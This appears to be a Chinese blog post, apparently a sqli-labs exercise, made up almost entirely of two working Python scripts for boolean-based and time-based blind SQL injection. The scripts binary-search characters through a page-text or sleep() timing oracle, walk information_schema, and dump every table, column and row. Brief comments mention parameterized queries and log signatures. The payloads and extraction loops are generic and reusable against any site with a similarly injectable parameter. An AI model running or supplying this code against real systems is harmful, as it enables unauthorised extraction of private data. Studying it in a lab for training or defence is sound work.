
时间盲注,boolean盲注,获取表、列、具体数据的函数

2025/2/19 9:19:04 来源:https://blog.csdn.net/yhahab/article/details/145620808  浏览:    关键词:时间盲注,boolen盲注,获取表、列、具体数据的函数

boolean盲注

# Boolean-based blind SQL injection walkthrough against the local sqli-labs
# lesson (Less-8).  Every probe is one GET whose `id` parameter carries a
# condition; the page's truthy banner acts as a one-bit oracle.  On the
# defending side the root cause is the injectable `id` parameter, which
# parameterized queries close, and the tell-tale in logs is a burst of
# near-identical requests that differ only in the injected condition.
import requests


def _page_says_true(url, payload):
    """Issue one probe and report whether the lab page shows its truthy banner."""
    response = requests.get(url, params={"id": payload})
    return "You are in" in response.text


def _find_char_code(url, payload_template, position):
    """Binary-search the ASCII code of the character at *position* (1-based).

    The search narrows 32..128 with the page oracle (about seven requests per
    character).  It stays at 32 when every probe is false, which is how the
    caller recognises that *position* lies past the end of the value.
    """
    lo, hi = 32, 128
    while lo < hi:
        mid = (lo + hi) // 2
        if _page_says_true(url, payload_template.format(i=position, mid=mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def boolean_based_injection(url, payload_template):
    """Recover a string character by character through the boolean oracle.

    ``payload_template`` is a ``str.format`` template with ``{i}`` (character
    position) and ``{mid}`` (ASCII threshold) placeholders.  At most 49
    characters are read; extraction stops at the first position whose search
    bottoms out at 32.  Progress is printed after every character.
    """
    recovered = ''
    for position in range(1, 50):  # assumes the value is shorter than 50 chars
        code = _find_char_code(url, payload_template, position)
        if code == 32:
            break
        recovered += chr(code)
        print(f"Current result: {recovered}")
    return recovered


def get_database_name(url):
    """Return the name of the database the lab page is connected to."""
    return boolean_based_injection(url, "1' and ascii(substr(database(), {i}, 1)) > {mid}-- ")


def _collect_rows(url, template_for, max_rows, label):
    """Pull rows ``0 .. max_rows-1`` one at a time until an empty one comes back.

    ``template_for(index)`` must return the payload template that selects row
    ``index`` (``limit index,1``).  Each non-empty hit is echoed as
    ``Found <label>: ...`` and appended to the returned list.
    """
    rows = []
    for index in range(max_rows):
        value = boolean_based_injection(url, template_for(index))
        if not value:
            break
        rows.append(value)
        print(f"Found {label}: {value}")
    return rows


def get_all_table_names(url, database_name):
    """Return up to 20 table names of *database_name* from information_schema."""
    return _collect_rows(
        url,
        lambda index: f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ",
        20,
        "table",
    )


def get_all_column_names(url, database_name, table_name):
    """Return up to 20 column names of *table_name* from information_schema."""
    return _collect_rows(
        url,
        lambda index: f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit {index},1), {{i}}, 1)) > {{mid}}-- ",
        20,
        "column",
    )


def get_all_data(url, database_name, table_name, column_name):
    """Return up to 50 values of *column_name* in ``database_name.table_name``."""
    return _collect_rows(
        url,
        lambda index: f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index},1), {{i}}, 1)) > {{mid}}-- ",
        50,
        "data",
    )


if __name__ == '__main__':
    # Local sqli-labs instance used for the boolean-based exercise.
    url = 'http://127.0.0.1:81/sqli-labs-master//Less-8/index.php'

    db_name = get_database_name(url)
    print(f"Database name: {db_name}")

    tables = get_all_table_names(url, db_name)
    print(f"All tables: {tables}")

    # Walk every table, then every column, dumping the column's rows.
    for table in tables:
        print(f"\nTable: {table}")
        columns = get_all_column_names(url, db_name, table)
        print(f"Columns: {columns}")
        for column in columns:
            print(f"\nColumn: {column}")
            data = get_all_data(url, db_name, table, column)
            print(f"Data: {data}")

运行结果(部分):

时间盲注

# Time-based blind SQL injection walkthrough against the local sqli-labs
# lesson (Less-9).  The page gives no visible oracle, so each probe asks the
# database to sleep() when the injected condition holds and the client reads
# the answer from the round-trip time.  Parameterized queries close the hole
# on the server side; operationally, a run of requests that each take about
# the sleep() delay is the signal a defender sees.
import time
import requests

# Delay requested in the payload and used as the decision threshold.
_SLEEP_SECONDS = 3


def _probe_is_slow(url, payload):
    """Send one probe and report whether the round trip took >= the sleep() delay."""
    started = time.time()
    requests.get(url, params={"id": payload})
    return time.time() - started >= _SLEEP_SECONDS


def _find_char_code(url, payload_template, position):
    """Binary-search the ASCII code at *position* (1-based) over 32..128.

    A slow response means the true character is above ``mid``.  The result
    stays at 32 when every probe is fast, i.e. *position* is past the end.
    """
    lo, hi = 32, 128
    while lo < hi:
        mid = (lo + hi) // 2
        if _probe_is_slow(url, payload_template.format(i=position, mid=mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_injection(url, payload_template, max_length=20):
    """Recover a string character by character through the timing oracle.

    :param url: target URL
    :param payload_template: ``str.format`` template with ``{i}`` (position)
        and ``{mid}`` (ASCII threshold) placeholders
    :param max_length: upper bound on the number of characters read
    :return: the recovered string (possibly empty)
    """
    recovered = ''
    for position in range(1, max_length + 1):
        code = _find_char_code(url, payload_template, position)
        if code == 32:  # nothing at this position: the value has ended
            break
        recovered += chr(code)
        print(f"Current result: {recovered}")
    return recovered


def get_data(url, query_template, max_items=20, max_length=20):
    """Generic row puller for database name, table names, column names or data.

    :param url: target URL
    :param query_template: inner SELECT; may contain ``{index}`` for ``limit``
    :param max_items: maximum number of rows to read
    :param max_length: maximum length of each row's value
    :return: list of recovered values, stopping at the first empty one
    """
    found = []
    for index in range(max_items):
        inner_query = query_template.format(index=index)
        payload_template = f"1' and if(ascii(substr(({inner_query}), {{i}}, 1)) > {{mid}}, sleep(3), 0)-- "
        value = blind_injection(url, payload_template, max_length)
        if not value:
            break
        found.append(value)
        print(f"Found item: {value}")
    return found


if __name__ == '__main__':
    # Local sqli-labs instance used for the time-based exercise.
    url = 'http://127.0.0.1:81/sqli-labs-master/Less-9/index.php'

    database_name = get_data(url, "select database()", max_items=1)[0]
    print(f"Database name: {database_name}")

    table_query = "select table_name from information_schema.tables where table_schema='{}' limit {{index}},1".format(database_name)
    table_names = get_data(url, table_query)
    print(f"All table names: {table_names}")

    # Walk every table, then every column, dumping the column's rows.
    for table_name in table_names:
        print(f"\nTable: {table_name}")
        column_query = "select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {{index}},1".format(database_name, table_name)
        column_names = get_data(url, column_query)
        print(f"Columns: {column_names}")
        for column_name in column_names:
            print(f"\nColumn: {column_name}")
            data_query = "select {} from {}.{} limit {{index}},1".format(column_name, database_name, table_name)
            data = get_data(url, data_query, max_items=50, max_length=50)
            print(f"Data: {data}")

运行结果(部分):
